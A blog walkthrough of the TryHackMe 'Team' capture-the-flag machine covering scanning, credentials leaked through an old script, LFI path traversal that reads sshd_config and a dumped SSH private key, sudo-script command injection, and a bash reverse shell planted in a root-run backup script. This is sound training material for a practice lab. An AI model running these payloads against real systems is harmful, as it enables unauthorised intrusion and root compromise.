Tryhackme - Team

Tryhackme – Team

In this walk through, we will be going through the Team room from Tryhackme. This room is rated as Easy on the platform and it consists of Enumeration, Exploitation and Privilege Escalation of a Linux boot2root machine. So, let’s get started without any delay.

Team

Machine Info:

TitleTeamfinal
IPaddress10.10.127.240
DifficultyEasy
ObjectiveBeginner friendly boot2root machine

Enumeration:

  • I started off with a regular nmap scan and found ports – 21 (FTP), 22 (SSH) and 80 (HTTP) opened.

wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.127.240

Nmap scan report for 10.10.127.240
Host is up (0.24s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.63 seconds

nmap scan

  • Enumerated the website running on port 80 and found a default Apache2 page.

Apache2 Ubuntu Default Page

  • Next, fired up gobuster on it however found nothing useful.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.127.240/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.127.240/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/28 21:14:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 11366]
/server-status        (Status: 403) [Size: 278]  
                                                 
===============================================================
2023/11/28 21:16:02 Finished
===============================================================

gobuster scan

  • Also tried logging into the FTP server using anonymous credentials but found no luck.

ftp anonymous login attempt

  • Next, checked the source code of the default Apache2 page on port 80 and found a text in the tile mentioning a domain name called team.thm with an instruction to add it in our hosts file.

Page source

  • So, i added the domain in my host file and was able to access the website running on it.

sudo nano /etc/hosts

/etc/hosts

Teams Site

  • Next, fired gobuster again on the new domain and found some pretty interesting results. I found – /robots.txt, /scripts and /assets directory.

wh1terose@fsociety:~/CTF/TryHackme/Team$ gobuster dir -u http://team.thm/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://team.thm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/28 21:42:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 273]
/.htaccess            (Status: 403) [Size: 273]
/.htpasswd            (Status: 403) [Size: 273]
/assets               (Status: 301) [Size: 305] [--> http://team.thm/assets/]
/images               (Status: 301) [Size: 305] [--> http://team.thm/images/]
/index.html           (Status: 200) [Size: 2966]                             
/robots.txt           (Status: 200) [Size: 5]                                
/scripts              (Status: 301) [Size: 306] [--> http://team.thm/scripts/]
/server-status        (Status: 403) [Size: 273]                     

===============================================================
2023/11/28 21:44:17 Finished
===============================================================

gobuster scan

  • I first checked robots.txt and found a potential username – dale.

robots.txt

  • Next, i tried the /scripts directory however access was denied and same for the /assets directory.

Forbidden error

  • I fired gobuster again, this time on the script directory with extensions of .txt and .js to reveal some juicy files which we might access and got a hit for script.txt.

wh1terose@fsociety:~/Desktop/Wordlist$ gobuster dir -u http://team.thm/scripts/ -w ~/Desktop/Wordlist/common.txt -x txt,js
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://team.thm/scripts/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,js
[+] Timeout:                 10s
===============================================================
2023/11/28 22:35:05 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 273]
/.hta.txt             (Status: 403) [Size: 273]
/.hta.js              (Status: 403) [Size: 273]
/.htaccess.js         (Status: 403) [Size: 273]
/.htpasswd.txt        (Status: 403) [Size: 273]
/.htaccess            (Status: 403) [Size: 273]
/.htaccess.txt        (Status: 403) [Size: 273]
/.htpasswd.js         (Status: 403) [Size: 273]
/.htpasswd            (Status: 403) [Size: 273]
/script.txt           (Status: 200) [Size: 597]
                                               
===============================================================
2023/11/28 22:40:02 Finished
===============================================================

gobuster scan

  • The script.txt file contains a script that is responsible for the FTP login however the creds was REDACTED. But in the notes section, there is mentioned that a old copy of the script is still lying on the server with creds in it and has an extension of “.old”.

script.txt

  • Downloaded the file and got our FTP user’s credentials.

http://team.thm/scripts/script.old

cat script.old

ftpuser:T3@m$h@r3

  • Next, logged into the FTP server and downloaded the New_site.txt file in which the user Gyles had instructed Dale that he was working on a PHP website which is in development and can be found at .dev along with that he had ask him to make a copy of his id_rsa file in relevant config file.

wh1terose@fsociety:~/CTF/TryHackme/Team$ ftp 10.10.127.240
Connected to 10.10.127.240.
220 (vsFTPd 3.0.3)
Name (10.10.127.240:wh1terose): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    2 65534    65534        4096 Jan 15  2021 workshare
226 Directory send OK.
ftp> cd workshare
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 1002     1002          269 Jan 15  2021 New_site.txt
226 Directory send OK.
ftp> get New_site.txt
local: New_site.txt remote: New_site.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for New_site.txt (269 bytes).
226 Transfer complete.
269 bytes received in 0.00 secs (135.3402 kB/s)
ftp> exit
221 Goodbye.

ftp login

cat New_site.txt

  • I first added the dev.team.thm domain to my /etc/hosts file to access it.

sudo nano /etc/hosts

/etc/hosts

dev.team.thm

Initial Access:

  • The script page endpoint calls for a page named teamshare.php. I checked the endpoint for the LFI and got lucky and was able to dump the contents of /etc/passwd file.

teamshare.php

/etc/passwd file

  • Next, i used the LFI to get the user flag.

http://dev.team.thm/script.php?page=../../../../home/dale/user.txt

user flag

  • As per the hint received by gayle regarding the id_rsa file. I checked the sshd_config for this and got Dale’s private key in it.

http://dev.team.thm/script.php?page=../../../../etc/ssh/sshd_config

sshd_config file

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAng6KMTH3zm+6rqeQzn5HLBjgruB9k2rX/XdzCr6jvdFLJ+uH4ZVE
NUkbi5WUOdR4ock4dFjk03X1bDshaisAFRJJkgUq1+zNJ+p96ZIEKtm93aYy3+YggliN/W
oG+RPqP8P6/uflU0ftxkHE54H1Ll03HbN+0H4JM/InXvuz4U9Df09m99JYi6DVw5XGsaWK
o9WqHhL5XS8lYu/fy5VAYOfJ0pyTh8IdhFUuAzfuC+fj0BcQ6ePFhxEF6WaNCSpK2v+qxP
zMUILQdztr8WhURTxuaOQOIxQ2xJ+zWDKMiynzJ/lzwmI4EiOKj1/nh/w7I8rk6jBjaqAu
k5xumOxPnyWAGiM0XOBSfgaU+eADcaGfwSF1a0gI8G/TtJfbcW33gnwZBVhc30uLG8JoKS
xtA1J4yRazjEqK8hU8FUvowsGGls+trkxBYgceWwJFUudYjBq2NbX2glKz52vqFZdbAa1S
0soiabHiuwd+3N/ygsSuDhOhKIg4MWH6VeJcSMIrAAAFkNt4pcTbeKXEAAAAB3NzaC1yc2
EAAAGBAJ4OijEx985vuq6nkM5+RywY4K7gfZNq1/13cwq+o73RSyfrh+GVRDVJG4uVlDnU
eKHJOHRY5NN19Ww7IWorABUSSZIFKtfszSfqfemSBCrZvd2mMt/mIIJYjf1qBvkT6j/D+v
7n5VNH7cZBxOeB9S5dNx2zftB+CTPyJ177s+FPQ39PZvfSWIug1cOVxrGliqPVqh4S+V0v
JWLv38uVQGDnydKck4fCHYRVLgM37gvn49AXEOnjxYcRBelmjQkqStr/qsT8zFCC0Hc7a/
FoVEU8bmjkDiMUNsSfs1gyjIsp8yf5c8JiOBIjio9f54f8OyPK5OowY2qgLpOcbpjsT58l
gBojNFzgUn4GlPngA3Ghn8EhdWtICPBv07SX23Ft94J8GQVYXN9LixvCaCksbQNSeMkWs4
xKivIVPBVL6MLBhpbPra5MQWIHHlsCRVLnWIwatjW19oJSs+dr6hWXWwGtUtLKImmx4rsH
ftzf8oLErg4ToSiIODFh+lXiXEjCKwAAAAMBAAEAAAGAGQ9nG8u3ZbTTXZPV4tekwzoijb
esUW5UVqzUwbReU99WUjsG7V50VRqFUolh2hV1FvnHiLL7fQer5QAvGR0+QxkGLy/AjkHO
eXC1jA4JuR2S/Ay47kUXjHMr+C0Sc/WTY47YQghUlPLHoXKWHLq/PB2tenkWN0p0fRb85R
N1ftjJc+sMAWkJfwH+QqeBvHLp23YqJeCORxcNj3VG/4lnjrXRiyImRhUiBvRWek4o4Rxg
Q4MUvHDPxc2OKWaIIBbjTbErxACPU3fJSy4MfJ69dwpvePtieFsFQEoJopkEMn1Gkf1Hyi
U2lCuU7CZtIIjKLh90AT5eMVAntnGlK4H5UO1Vz9Z27ZsOy1Rt5svnhU6X6Pldn6iPgGBW
/vS5rOqadSFUnoBrE+Cnul2cyLWyKnV+FQHD6YnAU2SXa8dDDlp204qGAJZrOKukXGIdiz
82aDTaCV/RkdZ2YCb53IWyRw27EniWdO6NvMXG8pZQKwUI2B7wljdgm3ZB6fYNFUv5AAAA
wQC5Tzei2ZXPj5yN7EgrQk16vUivWP9p6S8KUxHVBvqdJDoQqr8IiPovs9EohFRA3M3h0q
z+zdN4wIKHMdAg0yaJUUj9WqSwj9ItqNtDxkXpXkfSSgXrfaLz3yXPZTTdvpah+WP5S8u6
RuSnARrKjgkXT6bKyfGeIVnIpHjUf5/rrnb/QqHyE+AnWGDNQY9HH36gTyMEJZGV/zeBB7
/ocepv6U5HWlqFB+SCcuhCfkegFif8M7O39K1UUkN6PWb4/IoAAADBAMuCxRbJE9A7sxzx
sQD/wqj5cQx+HJ82QXZBtwO9cTtxrL1g10DGDK01H+pmWDkuSTcKGOXeU8AzMoM9Jj0ODb
mPZgp7FnSJDPbeX6an/WzWWibc5DGCmM5VTIkrWdXuuyanEw8CMHUZCMYsltfbzeexKiur
4fu7GSqPx30NEVfArs2LEqW5Bs/bc/rbZ0UI7/ccfVvHV3qtuNv3ypX4BuQXCkMuDJoBfg
e9VbKXg7fLF28FxaYlXn25WmXpBHPPdwAAAMEAxtKShv88h0vmaeY0xpgqMN9rjPXvDs5S
2BRGRg22JACuTYdMFONgWo4on+ptEFPtLA3Ik0DnPqf9KGinc+j6jSYvBdHhvjZleOMMIH
8kUREDVyzgbpzIlJ5yyawaSjayM+BpYCAuIdI9FHyWAlersYc6ZofLGjbBc3Ay1IoPuOqX
b1wrZt/BTpIg+d+Fc5/W/k7/9abnt3OBQBf08EwDHcJhSo+4J4TFGIJdMFydxFFr7AyVY7
CPFMeoYeUdghftAAAAE3A0aW50LXA0cnJvdEBwYXJyb3QBAgMEBQYH
-----END OPENSSH PRIVATE KEY-----

  • Logged into the server via SSH using dale’s private key.

ssh login dale

Privilege Escalation:

  • Next, checked for the sudo permissions for user dale and found out that he can run admin_checks script as user gyles without any password.

sudo -l

sudo -l

  • Checked the contents of admin_checks file and found out that it is asking for the person’s name and date to backup data. The thing to notice here is the error variable which has been declared and its value is being redirected to null without any checking.

cat admin_checks

  • I generated a shell.sh script with the following contents to spawn a shell.

#!/bin/bash

bash -p

shell.sh

shell.sh

  • I mentioned the path of our shell script when asked for the date by the program which then spawned a shell for us as user gyles.

dale@TEAM:/tmp$ sudo -u gyles /home/gyles/admin_checks
Reading stats.
Reading stats..
Enter name of person backing up the data: root
Enter 'date' to timestamp the file: /tmp/shell.sh
The Date is 
python3 -c 'import pty; pty.spawn("/bin/bash")'
gyles@TEAM:/tmp$ 

admin_checks

  • Fired up linpeas on the server to reveal some priv esc attack vectors and found a backup file in /usr/local/bin and the user gyles also belongs to the “admin” group.

/usr/local/bin

/dev/shm

  • Checked the contents of the backup.sh file and it is backing up some files from the web directory. The thing to notice here is the we can make write changes to the file as we belong to the admin group. So, changed the contents of the file to my below reverse shell.

main_backup.sh

bash -i >& /dev/tcp/10.18.1.78/1234 0>&1

bash reverse shell

  • Once the script is executed, i got a connection back at my netcat listener as user root and captured the root flag.

root flag

Task 1 – Deploy the box

Task 1 - Deploy the box

Task 2 – Flags

Question 1 – user.txt

Question 2 – root.txt

Task 2 - Flags

Also Read: Tryhackme – Introduction to DevSecOps

Conclusion:

Conclusion

So that was “Team” for you. We started off with our regular nmap scan and found three ports opened – 21 (FTP), 22 (SSH) and 80 (HTTP). Next, enumerated the web server on port 80 and found a hostname in page title – team.thm. Added it to our /etc/hosts file and accessed the application. Fired gobuster on the server and found a scripts directory. As access was denied, fired gobuster on that again and found a script.txt file. The file indicates a presence of a old file which has credentials in plain text. Downloaded the old script file by changing the extension to script.old and got the FTP creds of ftpuser. Logged into the FTP server using that and found a New_site.txt file. It reveals that a development server is running on .dev subdomain. Added it our /etc/hosts file and got access to the development server. Found a LFI vulnerability on page endpoint and using that dump the contents of sshd_config file which reveals SSH private key of user dale. Using the private key, got access into the server via SSH. Further, we checked the sudo permissions of user dale and found that we can run the admin_checks binary as user gyles. Exploited the error variable in admin_checks binary to get a shell as user gyles. At last, changed the contents of backup.sh file with our reverse shell. When executed, finally got a root shell back at our netcat listener. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top